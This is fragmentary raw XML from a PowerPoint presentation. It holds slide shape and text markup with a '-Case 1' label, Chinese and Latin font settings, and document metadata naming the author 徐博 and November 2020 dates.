                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>-Case 1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="5000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0096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455" y="-5161"/>
            <a:ext cx="585149" cy="745448"/>
            <a:chOff x="-43542" y="452431"/>
            <a:chExt cx="507999" cy="647163"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="63" name="矩形 62"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-43542" y="452431"/>
              <a:ext cx="304800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5923" y="452431"/>
              <a:ext cx="128534" cy="647163"/>
            </a:xfrm>
            <a:prstGeom prst="rect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75"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="矩形 64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2172335" y="1079500"/>
            <a:ext cx="4715510" cy="488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92DA6-B930-4F15-8957-88DD14C6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69" y="951591"/>
            <a:ext cx="4709076" cy="50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方正兰亭粗黑_GBK"/>
        <a:cs typeface=""/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Calibri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851</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>自定义</PresentationFormat>
  <Paragraphs>194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Wingdings</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Arial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徐博</dc:creator>
  <cp:lastModifiedBy>徐博</cp:lastModifiedBy>
  <cp:revision>42</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-11-05T06:41:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-11-13T06:50:49Z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